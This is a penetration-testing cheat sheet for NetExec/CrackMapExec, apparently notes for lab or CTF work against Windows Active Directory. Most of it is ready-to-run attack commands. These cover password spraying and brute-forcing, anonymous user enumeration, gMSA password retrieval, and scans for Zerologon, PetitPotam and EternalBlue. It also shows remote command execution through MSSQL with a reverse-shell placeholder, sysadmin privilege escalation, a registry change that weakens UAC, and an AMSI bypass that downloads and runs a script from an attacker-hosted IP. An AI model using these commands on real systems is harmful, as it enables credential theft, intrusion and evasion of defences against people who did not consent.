NetExec/CrackMapExec
CrackMapExec (CME) is an open-source post-exploitation tool commonly used by security professionals, penetration testers, and red teamers for network reconnaissance and lateral movement. It's particularly focused on networks that use the Windows Active Directory (AD) environment.
CrackMapExec, originally created by @byt3bl33d3r in 2015, was archived in September 2023 after years of maintenance by @mpgn_x64 and contributors. Due to challenges with community contributions and codebase discrepancies, active contributors transitioned to NetExec (nxc), a fully open-source, community-driven successor. NetExec ensures regular updates, seamless contributions, and continued development for all users.
Documentation: NetExec Wiki
We can use either one, as CrackMapExec also works fine for most use cases. In this note, I will alternate between the names—sometimes referring to it as NetExec (nxc) and other times as CrackMapExec (cme).
NetExec Installation
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
NetExec Menu
nxc -h
nxc smb -h # Protocol Specific Help
nxc winrm -L # List Available Modules
nxc winrm -M <module_name> --options # List Options for particular modules
Supported Protocols
NetExec currently supports remote authentication and operations using the following protocols: MSSQL, SMB, SSH, WinRM, WMI, VNC, LDAP, RDP, NFS, and FTP.
Example Use
General Use
nxc <protocol> <targetIP> -u <user or user_wordlist> -p <password or password_wordlist>
Example
nxc winrm 10.10.10.10 -u users.txt -p passwords.txt
(Pwn3d!) means success.
Target Enumeration
nxc <protocol> 10.10.10.10 # Single target
nxc <protocol> 10.10.10.10 10.10.10.20 10.10.10.30 # Multiple Target
nxc <protocol> 192.168.1.0/24 # CIDR Range
nxc <protocol> rezydev.local # Domain Name
nxc <protocol> target_list.txt # Target list file
Bruteforcing AD Accounts
When brute-forcing an AD account, it is important to use precise usernames and passwords to avoid being blocked by the domain group policy. Refer to the following module to generate possible usernames or passwords:
Password And Usernames Mutations
nxc smb 10.10.10.10 -u wordlist.txt -p wordlist.txt
Lockout policy configuration by the domain admin can result in the targeted account being locked out during this attack.
User Enumeration
# Credentialed
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --users
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --users | grep -oP '(?<=\\)[^ \t:]+'
# SMB NULL Session
nxc smb rezydev.local -u "" -p "" --users | awk '{print $4}' | uniq
# LDAP Anonymous
nxc ldap 10.10.10.10 --users
# Rid Bruteforce
nxc smb rezydev.local -u "" -p "" --rid-brute
Group Enumeration
# Need NULL/Anonymous Sessions or Valid Credentials
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --groups
# Use '--groups Administrators' to list all members in that group
# Query Group Membership with nxc modules
nxc ldap dc01.rezydev.local -u "rezydev" -p "Password123@" -M groupmembership -o USER=jethalal
Password Policy
# Credentialed
nxc smb 10.10.10.10 -u "rezydev" -p "Password1" --pass-pol
# Without Credentials
nxc ldap 10.10.10.10 --anon --pass-pol
Password Spraying
# Domain Joined Account
nxc smb 10.10.10.10 -u usernamelist.txt -p Password123@
# We can grep for '+' to find valid ones.
# Local Account
nxc smb --local-auth 192.168.5.0/24 -u administrator -H <HASH>
# NOTE: --local-auth will prevent account lockout, so always use it when
# playing with admin accounts.
# We can use '--continue-on-success' to test all accounts.
# Using LDAP Protocol
nxc ldap dc01.rezydev.local -u "rezydev" -p "Password123@" # FQDN is must
More Enumeration Flags
We can use these flags to enumerate if we have valid domain account.
SMB
| Switch | Description |
|---|---|
--loggedon-users | Lists users currently logged into the target machine. |
--sessions | Displays active SMB sessions on the target. |
--disks | Enumerates mounted disks or volumes on the target system. |
--computers | Lists computer accounts in the domain (useful in domain recon). |
--wmi | Executes a custom WMI query on the target system. |
--wmi-namespace | Specifies a WMI namespace to use (default: root\cimv2). |
--rid-brute | Brute-forces RIDs to enumerate local/domain user accounts on the target. |
--local-groups or --domain-groups | Lists local groups; if a group is specified, shows its members. [only works against Domain Controller] |
--shares | Enumerates available SMB shares and associated permissions. |
--users | Lists domain users retrieved from the target system. |
--groups | Lists domain groups in the target domain. |
--pass-pol | Retrieves the domain’s password policy (e.g., min length, complexity). |
LDAP
| Switch | Description |
|---|---|
--users | Enumerates all enabled domain user accounts. |
--groups | Lists all domain groups in the directory. |
--password-not-required | Retrieves users with the PASSWD_NOTREQD flag (users not required to have passwords). |
--trusted-for-delegation | Lists users and computers with the TRUSTED_FOR_DELEGATION flag set. |
--admin-count | Identifies objects with adminCount=1 (typically protected/high-privilege accounts). |
--get-sid | Retrieves the Security Identifier (SID) of the domain. |
--gmsa | Enumerates Group Managed Service Accounts (GMSA) and retrieves their passwords. |
RDP
| Switch | Description |
|---|---|
--nla-screenshot | Takes a screenshot of the RDP login screen if Network Level Authentication (NLA) is disabled. |
--screenshot | Captures a screenshot of the desktop after a successful RDP connection. |
--screentime <time> | Time (in seconds) to wait before taking a screenshot after RDP login. |
--res <WIDTHxHEIGHT> | Sets screen resolution for the RDP session (default: 1024x768). |
Vulnerability Scan
# Zerologon Scan
nxc smb 10.10.10.10 -M zerologon
# PetitPotam
nxc smb 10.10.10.10 -M petitpotam
# noPAC
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M nopac
# DFSCoerce
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M dfscoerce
# ShadowCoerce
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M shadowcoerce
# MS17-010 or EternalBlue
nxc smb 10.10.10.10 -M ms17-010
STATUS_PASSWORD_MUST_CHANGE
If you get STATUS_PASSWORD_MUST_CHANGE when trying to access an account, you can use Impacket's smbpasswd to change its password and access the account.
# Trying to access gives STATUS_PASSWORD_MUST_CHANGE
nxc smb 10.10.10.10 -u "rezydev" -p "OldPassword123@"
# Use smbpasswd
smbpasswd -r 10.10.10.10 -U rezydev
# Authenticate again with new credentials
nxc smb 10.10.10.10 -u "rezydev" -p "NewPassword123@"
MSSQL Enumeration & Attacks
If we gather a user with database admin or MSSQL permissions, or just a SQL service account, we can use NetExec/CrackMapExec to enumerate and attack remotely. There are various ways, but NetExec/CrackMapExec makes life easier.
If we see (Pwn3d!) it means that the account is Database Admin.
Execute Queries
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "QUERY HERE"
# If we have sql windows account we would use flag '--local-auth'.
Execute Windows Commands
# Execute Windows Commands
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "whoami"
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "revshells.com powershell (#3)"
Privilege Escalation Module
NetExec's mssql_priv module helps escalate MSSQL user privileges to sysadmin. It checks two methods: EXECUTE AS LOGIN and the db_owner role. The module has three options:
enum_privs(default) to list privilegesprivescto escalaterollbackto revert changes
# List Options
nxc mssql -M mssql_priv --options
# Check if user 'rezydev' can impersonate sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv
# If yes, use option 'privesc' to escalate and now rezydev is also sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv -o ACTION=privesc
# Since above command made our user sysadmin, we can now use -x to execute commands
# as sysadmin user.
# We can also use '-o ACTION=rollback' to revert previous action.
Command Execution
Domain Account
If we have domain account credentials we can use -x (for cmd) and -X (for PowerShell) without UAC being enabled.
Local Account
Only user with RID = 500 (i.e Administrator) can execute remote commands if it's local account. To allow other Local Administrator also execute commands locally, we can change registry value:
We can run commands using winrm protocol though if we are part of local administrator group, Remote Management Users group or if we got PowerShell Remoting permissions.
nxc smb 10.10.10.10 -u 'Administrator' -p 'AdminPass123@' --local-auth -x "reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
ASMI Bypass
We can also use custom ASMI Bypass instead of default used by -X for PowerShell.
nxc smb 10.10.10.10 -u 'rezydev' -p 'Pass123@' -X '$PSVersionTable' --amsi-bypass amsibypass.txt
# Content for amsi bypass:
IEX(New-Object Net.WebClient).DownloadString('http://TUN0-IP/bypass-ps1-script-amsi.ps1');
# Host the 'bypass-ps1-script-amsi.ps1' script using python http server. This is done to
# avoid 'Command exceeds maximum length' error.
We can also use ssh protocol with netexec to execute commands.